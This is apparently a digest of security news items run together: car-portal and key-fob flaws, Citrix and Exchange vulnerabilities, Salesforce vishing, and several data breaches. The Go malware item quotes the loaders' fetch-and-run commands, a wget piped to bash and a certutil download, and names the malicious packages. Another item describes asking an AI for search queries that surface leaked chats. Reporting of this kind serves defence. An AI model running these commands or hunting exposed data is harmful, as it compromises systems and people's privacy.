techcrunch.com - Security researcher Eaton Zveare told TechCrunch that the flaws he discovered in the carmaker's centralized dealer portal exposed vast access to customer and vehicle data. With this access, Zveare said he could remotely take over a customer's account and unlock their cars, and more.

A security researcher said flaws in a carmaker’s online dealership portal exposed the private information and vehicle data of its customers, and could have allowed hackers to remotely break into any of its customers’ vehicles.

Eaton Zveare, who works as a security researcher at software delivery company Harness, told TechCrunch the flaw he discovered allowed the creation of an admin account that granted “unfettered access” to the unnamed carmaker’s centralized web portal.

With this access, a malicious hacker could have viewed the personal and financial data of the carmaker’s customers, tracked vehicles, and enrolled customers in features that allow owners — or the hackers — to control some of their cars’ functions from anywhere.

Zveare said he doesn’t plan on naming the vendor, but said it was a widely known automaker with several popular sub-brands.

In an interview with TechCrunch ahead of his talk at the Def Con security conference in Las Vegas on Sunday, Zveare said the bugs put a spotlight on the security of these dealership systems, which grant their employees and associates broad access to customer and vehicle information.

Zveare, who has found bugs in carmakers’ customer systems and vehicle management systems before, found the flaw earlier this year as part of a weekend project, he told TechCrunch.

He said while the security flaws in the portal’s login system was a challenge to find, once he found it, the bugs let him bypass the login mechanism altogether by permitting him to create a new “national admin” account.

The flaws were problematic because the buggy code loaded in the user’s browser when opening the portal’s login page, allowing the user — in this case, Zveare — to modify the code to bypass the login security checks. Zveare told TechCrunch that the carmaker found no evidence of past exploitation, suggesting he was the first to find it and report it to the carmaker.

When logged in, the account granted access to more than 1,000 of the carmakers’ dealers across the United States, he told TechCrunch.

“No one even knows that you’re just silently looking at all of these dealers’ data, all their financials, all their private stuff, all their leads,” said Zveare, in describing the access.

Zveare said one of the things he found inside the dealership portal was a national consumer lookup tool that allowed logged-in portal users to look up the vehicle and driver data of that carmaker.

In one real-world example, Zveare took a vehicle’s unique identification number from the windshield of a car in a public parking lot and used the number to identify the car’s owner. Zveare said the tool could be used to look up someone using only a customer’s first and last name.

With access to the portal, Zveare said it was also possible to pair any vehicle with a mobile account, which allows customers to remotely control some of their cars’ functions from an app, such as unlocking their cars.

Zveare said he tried this out in a real-world example using a friend’s account and with their consent. In transferring ownership to an account controlled by Zveare, he said the portal requires only an attestation — effectively a pinky promise — that the user performing the account transfer is legitimate.

“For my purposes, I just got a friend who consented to me taking over their car, and I ran with that,” Zveare told TechCrunch. “But [the portal] could basically do that to anyone just by knowing their name — which kind of freaks me out a bit — or I could just look up a car in the parking lots.”

Zveare said he did not test whether he could drive away, but said the exploit could be abused by thieves to break into and steal items from vehicles, for example.

Another key problem with access to this carmaker’s portal was that it was possible to access other dealer’s systems linked to the same portal through single sign-on, a feature that allows users to log in to multiple systems or applications with just one set of login credentials. Zveare said the carmaker’s systems for dealers are all interconnected so it’s easy to jump from one system to another.

With this, he said, the portal also had a feature that allowed admins, such as the user account he created, to “impersonate” other users, effectively allowing access to other dealer systems as if they were that user without needing their logins. Zveare said this was similar to a feature found in a Toyota dealer portal discovered in 2023.

The Dutch Public Prosecution Service on Monday began phased restoration of its networks after a cyberattack last month forced the agency to take down its services offline.

The agency on Monday confirmed that hackers exploited a vulnerability in a Citrix device, but said that no data was stolen or manipulated in the breach. It took systems offline on July 17 following disclosures of vulnerabilities in Citrix NetScaler ADC and Gateway appliances.,

Dutch media reported in late July that "well-informed sources" believe Russia is behind the incident. Cybersecurity experts told newspaper Algemeen Dagblad that Russian hackers were likely gathering intelligence from the prosecution office or intending to disrupt a close Western ally of Ukraine. The Netherlands has been a strong supporter of Kyiv following Moscow's 2022 invasion of Ukraine, including by transferring F-16 airplanes and training the Ukraine military. Only on Monday it pledged 500 million euros to a NATO fund purchasing U.S. munitions for Ukraine, including Patriot missile intercept systems.

A July warning from the Dutch National Cyber Security Center that hackers were targeting vulnerabilities known as Citrix Bleed 2 prompted the prosecution service to isolate its internal network. The vulnerability, tracked as CVE-2025-5777, allows attackers to bypass multifactor authentication, hijack user sessions and gain unauthorized access to the equipment (see: Attackers Actively Exploit 'Citrix Bleed 2' Vulnerability).

Netherlands intelligence agencies earlier this year fingerprinted Moscow hackers for September 2024 breach resulting in the theft of work-related contact details of all Dutch police officers. Dutch agencies said the hackers behind the police incident belonged to a new cluster of threat activity they dubbed Laundry Bear. The group shares tactics with Unit 26165 of the Russian Main Intelligence Directorate, commonly tracked as APT28, the government said (see: NATO Countries Targeted By New Russian Espionage Group).

Citrix released patches for Citrix Bleed 2 on June 17. The Dutch Public Prosecution Service would not be the only organization to have succumbed to the flaw. Cybersecurity company Imperva in July reported observing more than 10 million attack attempts, although many of those were opportunistic and automated. Nor would Russia be the only nation-state to take advantage of the flaw. GreyNoise last month said it observed early exploitation attempts appearing to originate from China in what appeared to be targeted attacks.

arstechnica.com - Disclosure comes two months after Google warned the world of ongoing spree.
In June, Google said it unearthed a campaign that was mass-compromising accounts belonging to customers of Salesforce. The means: an attacker pretending to be someone in the customer's IT department feigning some sort of problem that required immediate access to the account. Two months later, Google has disclosed that it, too, was a victim.

The series of hacks are being carried out by financially motivated threat actors out to steal data in hopes of selling it back to the targets at sky-high prices. Rather than exploiting software or website vulnerabilities, they take a much simpler approach: calling the target and asking for access. The technique has proven remarkably successful. Companies whose Salesforce instances have been breached in the campaign, Bleeping Computer reported, include Adidas, Qantas, Allianz Life, Cisco, and the LVMH subsidiaries Louis Vuitton, Dior, and Tiffany & Co.

Better late than never
The attackers abuse a Salesforce feature that allows customers to link their accounts to third-party apps that integrate data with in-house systems for blogging, mapping tools, and similar resources. The attackers in the campaign contact employees and instruct them to connect an external app to their Salesforce instance. As the employee complies, the attackers ask the employee for an eight-digit security code that the Salesforce interface requires before a connection is made. The attackers then use this number to gain access to the instance and all data stored in it.

Google said that its Salesforce instance was among those that were compromised. The breach occurred in June, but Google only disclosed it on Tuesday, presumably because the company only learned of it recently.

“Analysis revealed that data was retrieved by the threat actor during a small window of time before the access was cut off,” the company said.

Data retrieved by the attackers was limited to business information such as business names and contact details, which Google said was “largely public” already.

Google initially attributed the attacks to a group traced as UNC6040. The company went on to say that a second group, UNC6042, has engaged in extortion activities, “sometimes several months after” the UNC6040 intrusions. This group brands itself under the name ShinyHunters.

“In addition, we believe threat actors using the 'ShinyHunters' brand may be preparing to escalate their extortion tactics by launching a data leak site (DLS),” Google said. “These new tactics are likely intended to increase pressure on victims, including those associated with the recent UNC6040 Salesforce-related data breaches.”

With so many companies falling to this scam—including Google, which only disclosed the breach two months after it happened—the chances are good that there are many more we don’t know about. All Salesforce customers should carefully audit their instances to see what external sources have access to it. They should also implement multifactor authentication and train staff how to detect scams before they succeed.

Socket’s Threat Research Team uncovered eleven malicious Go packages, ten of which are still live on the Go Module and eight of which are typosquats, that conceal an identical index-based string obfuscation routine. At runtime the code silently spawns a shell, pulls a second-stage payload from an interchangeable set of .icu and .tech command and control (C2) endpoints, and executes it in memory. Most of the C2 endpoints share the path /storage/de373d0df/a31546bf, and six of the ten URLs are still reachable, giving the threat actor on-demand access to any developer or CI system that imports the packages.

The eight packages include the following:

github.com/stripedconsu/linker
github.com/agitatedleopa/stm
github.com/expertsandba/opt
github.com/wetteepee/hcloud-ip-floater
github.com/weightycine/replika
github.com/ordinarymea/tnsr_ids
github.com/ordinarymea/TNSR_IDS
github.com/cavernouskina/mcp-go
github.com/lastnymph/gouid
github.com/sinfulsky/gouid
github.com/briefinitia/gouid
The packages all use an exec.Command("/bin/sh","-c", <obfuscated>) construct. The array-driven decoder rebuilds a one-liner that downloads a bash script with wget -O - <C2> | /bin/bash & on Unix systems, or (2) uses -urlcache -split -f <C2> %TEMP%\\appwinx64.exe followed by a background start on Windows. Observed second-stage ELF and PE binaries enumerate host information, read browser data, and beacon outbound, often after a first stage triggers a one-hour sleep to evade sandboxes. Because the second-stage payload delivers a bash-scripted payload for Linux systems and retrieves Windows executables via certutil.exe, both Linux build servers and Windows workstations are susceptible to compromise.

therecord.media -Germany’s highest court on Thursday ruled that law enforcement cannot use spyware to monitor personal devices in cases that carry less than a three year maximum sentence.

The court was responding to a lawsuit brought by the German digital freedoms organization Digitalcourage.

The plaintiffs argued that a 2017 rules change enabling law enforcement to use spyware to eavesdrop on encrypted chats and messaging platforms could unfairly expose communications belonging to people who are not criminal suspects.

The 2017 change to the German criminal procedure code was not precise enough about when spyware can be used, the court ruled, saying that snooping software is only appropriate in investigations of serious cases.

Such surveillance causes a “very severe interference” with fundamental rights, the court said in a press release.

Law enforcement use of spyware “enables the interception and analysis of all raw data exchanged and thus has an exceptional reach, particularly given the realities of modern information technology and its significance for communication relations,” the press release said.

politico.com - The identities of confidential court informants are feared compromised in a series of breaches across multiple U.S. states.

The electronic case filing system used by the federal judiciary has been breached in a sweeping cyber intrusion that is believed to have exposed sensitive court data across multiple U.S. states, according to two people with knowledge of the incident.

The hack, which has not been previously reported, is feared to have compromised the identities of confidential informants involved in criminal cases at multiple federal district courts, said the two people, both of whom were granted anonymity because they were not authorized to speak publicly about the hack.

The Administrative Office of the U.S. Courts — which manages the federal court filing system — first determined how serious the issue was around July 4, said the first person. But the office, along with the Justice Department and individual district courts around the country, is still trying to determine the full extent of the incident.

It is not immediately clear who is behind the hack, though nation-state-affiliated actors are widely suspected, the people said. Criminal organizations may also have been involved, they added.

The Administrative Office of the U.S. Courts declined to comment. Asked whether it is investigating the incident, the FBI referred POLITICO to the Justice Department. The Justice Department did not immediately reply to a request for comment.

It is not immediately clear how the hackers got in, but the incident is known to affect the judiciary’s federal core case management system, which includes two overlapping components: Case Management/Electronic Case Files, or CM/ECF, which legal professionals use to upload and manage case documents; and PACER, a system that gives the public limited access to the same data.

In addition to records on witnesses and defendants cooperating with law enforcement, the filing system includes other sensitive information potentially of interest to foreign hackers or criminals, such as sealed indictments detailing non-public information about alleged crimes, and arrests and search warrants that criminal suspects could use to evade capture.

Chief judges of the federal courts in the 8th Circuit — which includes Arkansas, Iowa, Minnesota, Missouri, Nebraska, North Dakota, and South Dakota — were briefed on the hack at a judicial conference last week in Kansas City, said the two people. It is unclear who delivered the brief, though the Director of the Administrative Office of the U.S. Courts, Judge Robert J. Conrad, Jr., was in attendance, per the first person. Supreme Court Justice Brett Kavanaugh was also in attendance but didn’t address the breach in his remarks.

Staff for Conrad, a district judge in the Western District of North Carolina, declined to comment.

The hack is the latest sign that the federal court filing system is struggling to keep pace with a rising wave of cybersecurity threats.

www.digitaldigging.org - Digital Digging investigation: how your AI conversation could end your career

Corporate executives, government employees, and professionals are confessing to crimes, exposing trade secrets, and documenting career-ending admissions in ChatGPT conversations visible to anyone on the internet.

A Digital Digging investigation analyzed 512 publicly shared ChatGPT conversations using targeted keyword searches, uncovering a trove of self-incrimination and leaked confidential data. The shared chats include apparent insider trading schemes, detailed corporate financials, fraud admissions, and evidence of regulatory violations—all preserved as permanently searchable public records.

Among the discoveries is a conversation where a CEO revealed this to ChatGPT:

Confidential Financial Data: About an upcoming settlement

Non-Public Revenue Projections: Specific forecasts showing revenue doubling

Merger intelligence: Detailed valuations

NDA-Protected Partnerships: Information about Asian customers

The person also revealed internal conflict and criticizing executives by name.

Our method reveals an ironic truth: AI itself can expose these vulnerabilities. After discussing the dangers of making chats public, we asked Claude, another AI chatbot, to suggest Google search formulas that might uncover sensitive ChatGPT conversations.

cbc.ca - The insurance company did not cover any of the city’s claims totalling about $5 million. City staff say they've learned from their mistakes and are taking accountability for the cybersecurity breach.

Many City of Hamilton departments didn't have multi-factor authentication in place before cyber criminals launched a massive ransomware attack in February 2024, paralysing nearly all municipal services for weeks.

Multi-factor authentication, also sometimes in the form of two-step verification, is a widely used layer of extra security for users logging into a system like their email accounts. They're required to verify their identity using more than one method, such as entering a code texted to their phone.

It's been used by corporations and technology companies for years. Google, for example, launched its two-step log-in system in 2011.

While not the only reason the attackers were successful, the city's lack of multi-factor authentication was a "root cause" of the breach, as determined by the city's insurance company, said a staff report to the general issues committee Wednesday.

As a result, the insurance company did not cover any of the city's claims totalling about $5 million.

"This has been a test of our system and a test of our leadership," said Mayor Andrea Horwath at a news conference Wednesday. "We are not sweeping this under the rug. We are owning it, we're fixing it and we're learning from it."

The lack of multi-factor authentication, and no insurance coverage, was reported publicly for the first time this month.

The staff report said: "According to the policy, no coverage was available under the policy for any losses where the absence of MFA was the root cause of a cyber breach."
Solicitor Lisa Shields told councillors Wednesday that staff were aware of the multi-factor authentication requirement in their insurance policy in the fall of 2022 and began rolling out a pilot program the following year, but for only a few departments.

In early 2024, the city was preparing to fully implement multi-factor authentication, but then the ransomware attack took place on Feb. 25, said Cyrus Tehrani, acting chief information officer.

He told reporters that — contrary to what the insurance company found — the breach would've happened even with multi-factor authentication in place. The city also told CBC Hamilton in an email that it was a "highly sophisticated attack on an external, internet-facing server, gaining unauthorized access to the City of Hamilton systems."

Attackers demanded $18.5M in ransom
About 80 per cent of city systems were impacted and the attackers demanded the city pay $18.5 million to unlock it — a massive crisis and among the most significant in Canada, city manager Marnie Cluckie told councillors.

Based on advice from outside experts, the city decided not to pay the ransom and instead recover what it could and rebuild everything else. The police investigation is ongoing, Cluckie said.

To date, the city has spent $18.4 million and will continue to pay nearly $400,000 a month until November 2026 to rebuild its systems, said Mike Zegarac, general manager of finance.

Hackers are using a custom Flipper Zero firmware to bypass security protections in automotive key fobs, putting millions of vehicles at risk.

Hackers have a new way to break into – or even steal – your car, and all it takes is the push of a button. Malicious actors are circumventing modern security protections in automotive key fobs, researchers warn, putting millions of vehicles at risk.

The hack works by intercepting and cloning a key fob’s radio signal, using custom firmware built for the Flipper Zero, a handheld device designed for analyzing and testing wireless communication protocols.

It bypasses a security mechanism known as rolling codes, designed to prevent thieves from reusing captured key fob signals to unlock a car. Each time the key fob is pressed, an internal algorithm generates a new, one-time-use code, leading the vehicle to unlock only if the code is confirmed to be valid.

But the new hack sidesteps these protections by exploiting the rolling code algorithm to calculate valid key fob commands based on a single intercepted signal.

“I can sit in a parking lot and wait for someone to lock their car, and immediately I get all their fob buttons,” Jeremy Yablan, a hacker known online as RocketGod, told Straight Arrow News. “Other attacks are tricks. This one just captures a single keypress and decodes all buttons and rolling codes in an instant. You open your trunk – the bad guy has your entire fob.”

Yablan described the attack as “ridiculously fast and easy.”

Many vehicles vulnerable
SAN obtained a copy of the firmware and tested the attack in a controlled setting with the permission of vehicle owners. In one case, capturing a single unlock signal allowed the Flipper Zero to repeatedly lock, unlock and open the trunk of the target car.

The hack also disabled the original key fob until it was manually reset.

Vehicles vulnerable to the attack include numerous models manufactured by Chrysler, Dodge, Fiat, Ford, Hyundai, Jeep, Kia, Mitsubishi and Subaru, according to an infographic provided with the firmware. The infographic says updates to attack other car makers, such as Honda, are “in development.” It also mentions high-end car companies such as Alfa Romeo, Ferrari and Maserati.

Numerous car companies listed as susceptible to attack did not respond to SAN’s requests for comment. James Bell, the head of corporate communications at Kia America, said his company “is not aware of this situation and therefore have no comment to offer.”

The team behind the Flipper Zero device, which does not endorse the custom firmware, did not respond to requests for comment.

Created by Russian hacker
The hack appears to be based on a 2022 attack known as “RollBack,” developed by researchers at CrySys Lab in Hungary. The researchers demonstrated how rolling code protections could be broken by capturing valid signals and replaying them in a specific order to bypass a vehicle’s code synchronization system.

The firmware for the Flipper Zero apparently was created by a Russian hacker. Advertisements for the firmware, which includes a serial lock designed to keep it from being distributed to additional users, show it being listed online for as much as $1,000.

The firmware obtained by SAN was a version that had its serial lock disabled by security researchers. The firmware’s creator told SAN that a newer version has since been developed. He shared an updated infographic that lists Suzuki as another vulnerable make.

SAN is not naming the hacker to avoid facilitating the sale of his firmware to potential thieves.

The freelance security researcher and YouTuber known as Talking Sasquach, who regularly covers the Flipper Zero, said the firmware’s creator is marketing the tool specifically to criminals.

‘Only a matter of time’
Protections against the attack are limited.

“There’s really not much people can do to protect themselves against this attack short of just not using your key fob and only using the keys,” Talking Sasquach said.

Given that many modern vehicles do not use traditional keys and rely entirely on key fobs, such workarounds are not viable for all drivers.

“Car companies could issue an update,” Talking Sasquach said, “but they’d have to pull in all of the vehicles and change their software and the key fob’s software, which would probably not be feasible, and a huge cost to manufacturers.”

Despite attempts by the firmware’s creator to limit its distribution, Yablan and other hackers have already managed to remove the built-in licensing restrictions.

The hack is likely to become more commonly used, security researcher Ryan Montgomery, founder of Pentester.com, told SAN.

“It’s only a matter of time,” he said, “before it gets leaked to the masses.”

bleepingcomputer.com - Microsoft has warned customers to mitigate a high-severity vulnerability in Exchange Server hybrid deployments that could allow attackers to escalate privileges in Exchange Online cloud environments undetected.

Exchange hybrid configurations connect on-premises Exchange servers to Exchange Online (part of Microsoft 365), allowing for seamless integration of email and calendar features between on-premises and cloud mailboxes, including shared calendars, global address lists, and mail flow.

However, in hybrid Exchange deployments, on-prem Exchange Server and Exchange Online also share the same service principal, which is a shared identity used for authentication between the two

By abusing this shared identity, attackers who control the on-prem Exchange can potentially forge or manipulate trusted tokens or API calls that the cloud side will accept as legitimate, as it implicitly trusts the on-premises server.

Additionally, actions originating from on-premises Exchange don't always generate logs associated with malicious behavior in Microsoft 365; therefore, traditional cloud-based auditing (such as Microsoft Purview or M365 audit logs) may not capture security breaches if they originated on-premises.

"In an Exchange hybrid deployment, an attacker who first gains administrative access to an on-premises Exchange server could potentially escalate privileges within the organization's connected cloud environment without leaving easily detectable and auditable trace," Microsoft said on Wednesday in a security advisory describing a high-severity privilege escalation vulnerability now tracked as CVE-2025-53786.

The vulnerability affects Exchange Server 2016 and Exchange Server 2019, as well as Microsoft Exchange Server Subscription Edition, the latest version, which replaces the traditional perpetual license model with a subscription-based one.

While Microsoft has yet to observe in-the-wild exploitation, the company has tagged it as "Exploitation More Likely" because its analysis revealed that exploit code could be developed to consistently exploit this vulnerability, increasing its attractiveness to attackers.

theregister.com - European airline giants Air France and KLM say they are the latest in a string of major organizations to have their customers' data stolen by way of a break-in at a third party org.

The airlines, which share a parent company, Air France-KLM Group, said in a joint statement that they "detected unusual activity on an external platform we use for customer service," which led to attackers accessing customer data.

"Our IT security teams, along with the relevant external party, took immediate action to stop the unauthorized access," the statement read. "Measures have also been implemented to prevent recurrence. Internal Air France and KLM systems were not affected.

"No sensitive data such as passwords, travel details, Flying Blue miles, passport, or credit card information was stolen."

The airlines did not publicly specify the types of data that were stolen, but the exclusion of sensitive data suggests basic personal information was involved.

However, customer notifications circulating online noted that first and family names, along with contact details, Flying Blue numbers and tier levels, and the subject lines of service request emails were accessed.

KLM and Air France advised customers to be on heightened alert for phishing attempts. Both said they had referred themselves to the Dutch and French data protection authorities, respectively.

The customer notice from Barry ter Voert, chief experience officer at KLM, read: "We recommend staying alert when receiving messages or other communication using your personal information, and to be cautious of any suspicious activity. The data involved in this breach could be used to make phishing messages appear more credible. If you receive unexpected messages or phone calls, especially asking for personal information or urging you to take action, please check their authenticity.

"We understand the concern this may cause, and we deeply regret any inconvenience this may have caused you."

The Register approached the companies for additional information but they did not comment beyond the public statement.

The attack marks the latest in a string of data lapses at major organizations that also blamed a third party.

In recent weeks, luxury retailers Dior, Chanel, and Pandora all reported similar leaks at third party providers, as did Google, Qantas, and Allianz.

All of the above declined to identify the third party in question except for Google, which said this week that one of its Salesforce instances was raided.

None of the victims have attributed their attacks to any group – yet – but the prime suspect behind all of these intrusions is the ShinyHunters cybercrime crew, which is perhaps best known for its role in last year's attacks on Snowflake customers.

Scattered Spider also changed its focus toward airlines earlier this year, and some researchers said it could be behind the attack on Hawaiian Airlines in June.

Check Point said last month that the attacks on Qantas and WestJet, which all occurred within three weeks of one another, bore hints of Scattered Spider's involvement, mainly due to the tradecraft that led to the intrusions.

propublica.org - Microsoft announced that Chinese state-sponsored hackers had exploited vulnerabilities in its popular SharePoint software but didn’t mention that it has long used China-based engineers to maintain the product.
ast month, Microsoft announced that Chinese state-sponsored hackers had exploited vulnerabilities in SharePoint, the company’s widely used collaboration software, to access the computer systems of hundreds of companies and government agencies, including the National Nuclear Security Administration and the Department of Homeland Security.

The company did not include in its announcement, however, that support for SharePoint is handled by a China-based engineering team that has been responsible for maintaining the software for years.

ProPublica viewed screenshots of Microsoft’s internal work-tracking system that showed China-based employees recently fixing bugs for SharePoint “OnPrem,” the version of the software involved in last month’s attacks. The term, short for “on premises,” refers to software installed and run on customers’ own computers and servers.

Microsoft said the China-based team “is supervised by a US-based engineer and subject to all security requirements and manager code review. Work is already underway to shift this work to another location.”

It’s unclear if Microsoft’s China-based staff had any role in the SharePoint hack. But experts have said allowing China-based personnel to perform technical support and maintenance on U.S. government systems can pose major security risks. Laws in China grant the country’s officials broad authority to collect data, and experts say it is difficult for any Chinese citizen or company to meaningfully resist a direct request from security forces or law enforcement. The Office of the Director of National Intelligence has deemed China the “most active and persistent cyber threat to U.S. Government, private-sector, and critical infrastructure networks.”

ProPublica revealed in a story published last month that Microsoft has for a decade relied on foreign workers — including those based in China — to maintain the Defense Department’s cloud systems, with oversight coming from U.S.-based personnel known as digital escorts. But those escorts often don’t have the advanced technical expertise to police foreign counterparts with far more advanced skills, leaving highly sensitive information vulnerable, the investigation showed.

ProPublica found that Microsoft developed the escort arrangement to satisfy Defense Department officials who were concerned about the company’s foreign employees, and to meet the department’s requirement that people handling sensitive data be U.S. citizens or permanent residents. Microsoft went on to win federal cloud computing business and has said in earnings reports that it receives “substantial revenue from government contracts.” ProPublica also found that Microsoft uses its China-based engineers to maintain the cloud systems of other federal departments, including parts of Justice, Treasury and Commerce.

In response to the reporting, Microsoft said that it had halted its use of China-based engineers to support Defense Department cloud computing systems, and that it was considering the same change for other government cloud customers. Additionally, Defense Secretary Pete Hegseth launched a review of tech companies’ reliance on foreign-based engineers to support the department. Sens. Tom Cotton, an Arkansas Republican, and Jeanne Shaheen, a New Hampshire Democrat, have written letters to Hegseth, citing ProPublica’s investigation, to demand more information about Microsoft’s China-based support.

Microsoft said its analysis showed that Chinese hackers were exploiting SharePoint weaknesses as early as July 7. The company released a patch on July 8, but hackers were able to bypass it. Microsoft subsequently issued a new patch with “more robust protections.”

The U.S. Cybersecurity and Infrastructure Security Agency said that the vulnerabilities enable hackers “to fully access SharePoint content, including file systems and internal configurations, and execute code over the network.” Hackers have also leveraged their access to spread ransomware, which encrypts victims’ files and demands a payment for their release, CISA said.

bangkokpost.com - A major private hospital in Thailand has been fined 1.2 million baht after paper patient records were found being used as snack bags, according to the country’s data protection watchdog.

The incident was among five major cases reported on Friday by the government’s Personal Data Protection Committee (PDPC), along with penalties imposed against entities for violating data laws.

The hospital, which was not named, came under scrutiny after paper files from its patient registry were found being used as pouches for crispy crepes, known locally as khanom Tokyo.

The committee’s investigation revealed that over 1,000 protected files had been misplaced after being sent for destruction.

The hospital said it had entrusted document disposal to a small business but failed to follow up. The business owner admitted fault, explaining the documents were leaked after being stored at their home.
The PDPC fined the hospital 1.21 million baht. The disposal business owner was fined 16,940 baht.

In another case, the committee revealed that a state agency leaked the personal information of over 200,000 citizens after a cyber-attack on its web application. The data was later posted for sale on the dark web.

An investigation found inadequate security measures, such as weak passwords and no risk assessment, as well as the absence of a data processing agreement with the web app developer.

A combined fine of 153,120 baht was imposed on both the agency and its private contractor.

The other three cases involved leaks from online retailers and distributors, with fines ranging from 500,000 to 7 million baht.

Since 2024, the PDPC has concluded six cases of personal data violations, totalling 21.5 million baht in fines.

databreaches.net - Chatox and Brosix are communications platforms that advertise for personal use and team use. They are owned by Stefan Chekanov.

The only statement Chatox makes about its data security is “Chatox employs encryption across all communications, making it an extremely secure communication and collaboration platform.”

Brosix Enterprise advertises its security:

Brosix provides you with an efficient and secure communication environment, and Text Chat is a central element of this. With this feature you can instantly send, and receive, text messages to your network contacts. Better yet, all messages sent with Brosix are fully encrypted using end-to-end encryption technology, guaranteeing that your communication remains secure.

Brosix uses AES (Advanced Encryption Standard, used by US government) with 256 bit keys. Which means the encryption can’t be broken in a reasonable time.

All communication channels are direct, peer-to-peer, between the users and are not routed through Brosix servers. In some cases, if user firewalls do not allow direct connection, data is routed through Brosix servers. In these rare cases, the channels through the servers are built in a way that Brosix cannot decrypt and see the user data that flows.

So why did a researcher find a lot sensitive chats in plain text with individuals’ first and last names, username, password, IP address, chat message, and attached files — all unencrypted?

What to Know
A researcher contacted DataBreaches after finding an unsecured backup with 155.3 GB of unique compressed files.
There was a total of 980,972 entries in the users’ tables, with entries going back to 2006.
The researcher first logged the backup as exposed in late April. From the logs, the researcher stated that the files in question were exposed from at least May 11th 2024 – July 4th 2025 . Because logging only began in late April, the server could have been exposed before then.
The top email domains for each of the two platforms are listed below:
Brosix Enterprise Database Chatox Database
14826 gmail.com
5472 yahoo.com
2086 hotmail.com
1805 mail.ru
1111 allstate.com
679 rankinteractive.com
633 yandex.ru
582 issta.co.il
376 outlook.com
353 gp-servicedirect.com 63291 mail.ru
48075 gmail.com
20099 yandex.ru
13789 yahoo.com
7868 hotmail.com
6734 bk.ru
4541 allstate.com
3316 rambler.ru
3297 inbox.ru
3204 list.ru

san.com - Data stolen by a ransomware gang has exposed highly sensitive information from a Louisiana sheriff’s office, including the names, telephone numbers and Social Security numbers of confidential informants in criminal investigations. Straight Arrow News obtained a copy of the data from DDoSecrets, a non-profit that archives hacked and leaked documents in the public interest.

Medusa, a suspected Russian cybercrime group, said on its Dark Web blog in April 2024 that it had pilfered more than 90 gigabytes of data from the East Baton Rouge Sheriff’s Office.

The sheriff’s office initially claimed the intrusion had been quickly detected and stopped, allowing the hackers to obtain only a limited amount of data, such as “screenshots of file folders and still images from video files, WBRZ-TV reported.

65,000 files
A sample of the stolen files shared at the time by Medusa included payroll information, showing that the breach was more substantial than first claimed by the sheriff’s office. Medusa threatened to release all of the data, which contains over 65,000 files, unless the sheriff’s office paid $300,000. There’s no indication the ransom was ever paid.

The East Baton Rouge Sheriff’s Office did not respond to a request for comment from SAN.

SAN’s analysis of the full data cache provides an insight into just how damaging the breach was. Given the sensitivity of the data, DDoSecrets is only sharing it with approved journalists, researchers and defense attorneys practicing in Baton Rouge.

The data covers both the banal day-to-day operations of a law enforcement agency and the potentially life-and-death details of drug cases and other criminal investigations.

“The East Baton Rouge Sheriff’s Office data is an extraordinary example of the inner workings of a police department, down to Internal Affairs investigations and details about the use of confidential informants,” DDoSecrets co-founder Emma Best told SAN. “While the police are obviously of public interest and deserve no privacy, their targets and victims do. With that in mind, we’re refraining from republishing the full data to the public while encouraging journalists and civil rights advocates to engage with it.”

Best said the data cache was posted by Medusa to the messaging app Telegram, but that their channels were repeatedly shut down. The contents of the breach have not been extensively reported on until now.

Law enforcement entities are common targets for ransomware gangs. In 2021, the Metropolitan Police Department in Washington, D.C., was hacked by a Russian-speaking ransomware group known as Babuk, resulting in the leak of 250 gigabytes of data after the department refused to pay a ransom. The data also included sensitive information on informants and police officers.

Confidential informants
Contracts signed by 34 confidential informants in 2023 are among the exposed data from Louisiana.

A document titled “CI Information” lists the names, dates of birth and Social Security numbers of 200 confidential informants involved in narcotics investigations. Names of deputies overseeing informants and case numbers are included, as well as whether the informants are still active. Deactivation dates, indicating when an informant’s work ended, range from 2020 to 2023.

A folder titled “C.I. G.P.S. routes” contains numerous images of maps detailing the movements of informants across Baton Rouge.

Seized devices
A document last edited in August 2023 lists devices seized by the sheriff’s office, primarily mobile phones. The document notes whether a warrant had been requested or obtained, as well as additional steps that may have been needed to access a device’s contents.

Several phones were turned over to the FBI, the data indicates. Some files mention that cellphone hacking tools were needed to pull data from the devices. Files refer to both Cellebrite, an Israeli company that produces tools for extracting data from mobile devices, and GrayKey, a mobile forensics tool developed by the US-based company Grayshift that similarly unlocks and extracts data from phones.

The data also shows that the Drug Enforcement Agency sought access to historical location data and other information from a target’s cell phone.

Cell phone surveillance
Pen trap and trace search warrants — court orders that allow law enforcement to collect cell phone metadata such as numbers dialed — were issued to cellular service providers T-Mobile, AT&T and Verizon.

Many of the warrants mention the use of a “cell site simulator,” also known as an IMSI catcher, to reveal a suspect’s whereabouts. Cell site simulators, commonly referred to as Stingrays, are devices that mimic cell phone towers and can be used to pinpoint the location of specific phones.

Sock puppet accounts
A presentation about online investigations advises officers to create “sock puppet accounts,” a term used to describe a false online identity created to conceal an individual’s real one.

For instance, deputies were told to use a free VPN browser add-on for Google Chrome to hide their IP addresses. The website thisxdoesnotexist.com is also listed as a resource for deputies to create AI-generated images of everything from fake people to resumes.

Hidden cameras and drones
A folder titled “Tech” includes brochures listing an array of surveillance technology, such as GPS trackers and hidden cameras that can be placed inside items such as clothing, vape pens and Newport menthol cigarette packs.

A list of hidden cameras contains IP addresses, login credentials for remote access and identifying information for both the devices and SIM cards used.

One list shows 19 drones operated by the sheriff’s office, the majority of which are made by the Chinese manufacturer DJI. The drones are used by several divisions of the sheriff’s office, including SWAT and narcotics, for suspect apprehension and search and rescue missions.

A PowerPoint presentation in the data cache shows the default password used to access the internal system for logging drone usage. A folder titled “Operation Photos & Videos” shows both surveillance of criminal suspects as well as overhead images of sheriff’s deputies at a shooting range.

Internal affairs
Internal affairs data, including complaints made against the sheriff’s office, accuse deputies of racial profiling, unwarranted searches and excessive force.

Incidents range from a deputy being reprimanded for letting his 10- and 12-year-old children drive his patrol vehicle to another being arrested for battery and suspended for 30 days after being involved in a “road rage-type” episode.

Polygraph results
Other files detail the results of polygraph tests given to both deputies and suspects.

One file graphically details an alleged sexual assault and concludes that the person being tested had been deceitful. A deputy was also accused of being deceitful after being asked whether he’d referred to homosexuals as “disgusting” when discussing a fellow deputy believed to be gay.

